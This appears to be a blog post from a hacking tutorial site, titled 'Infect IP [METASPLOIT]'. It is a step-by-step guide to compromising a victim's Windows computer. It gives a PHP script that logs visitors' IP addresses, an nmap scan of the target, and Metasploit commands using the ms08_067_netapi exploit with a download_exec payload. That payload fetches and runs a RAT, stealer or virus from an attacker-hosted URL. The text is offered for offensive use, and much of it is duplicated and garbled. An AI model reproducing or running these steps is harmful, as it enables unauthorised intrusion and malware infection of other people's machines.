Infect IP [METASPLOIT]
WE NEED:
1. Nmap
2. Metasplo
1. First we need to find victms IP.
__
a) http://www.s33.net/rec/home
b) Script for stealing IP adress:
Code:
<?
$file = "ip.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen($file, 'a');
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fclose($handle);
?>
__
2. Now we need to create database.
We open metasploit and type 'db_create' (this will create database)
If you created database before, than its enough to type 'db_connect' ...
3. Now we scan victms IP
So in metasploit type 'Nmap'
Next command is 'nmap -sT -sV <target ip>' (in '<target ip>' we type victms IP without '<>')
When scanning is done, we will have detailed description victms computer...
If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..
4. Exploit
In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)
Now type 'set target 0'
Than type 'show payloads'
Than 'set payload / download_exec'
Than type 'Show options'
You will se enough of options, fill only RHOST i URL.
Type: set RHOST <target IP>
Than type 'set URL http://www.site.com/xxx.exe'
WE NEED:
1. Nmap
2. Metasplo
1. First we need to find victms IP.
__
a) http://www.s33.net/rec/home
b) Script for stealing IP adress:
Code:
<?
$file = "ip.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen($file, 'a');
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fclose($handle);
?>
__
2. Now we need to create database.
We open metasploit and type 'db_create' (this will create database)
If you created database before, than its enough to type 'db_connect' ...
3. Now we scan victms IP
So in metasploit type 'Nmap'
Next command is 'nmap -sT -sV <target ip>' (in '<target ip>' we type victms IP without '<>')
When scanning is done, we will have detailed description victms computer...
If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..
4. Exploit
In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)
Now type 'set target 0'
Than type 'show payloads'
Than 'set payload / download_exec'
Than type 'Show options'
You will se enough of options, fill only RHOST i URL.
Type: set RHOST <target IP>
Than type 'set URL http://www.site.com/xxx.exe'
('http://www.site.com/ -should be your site ,
a 'xxx.exe' is name of your RAT, stiler, virus what is uploaded on your site)
(Fileave ,Or Free Web Hosting, Free Templates, Free Tutorials and More - Zymic)
AT the end we type 'exploit'
(This will run file witch you chose in step above)
(Fileave ,Or Free Web Hosting, Free Templates, Free Tutorials and More - Zymic)
AT the end we type 'exploit'
(This will run file witch you chose in step above)
0 comments:
Post a Comment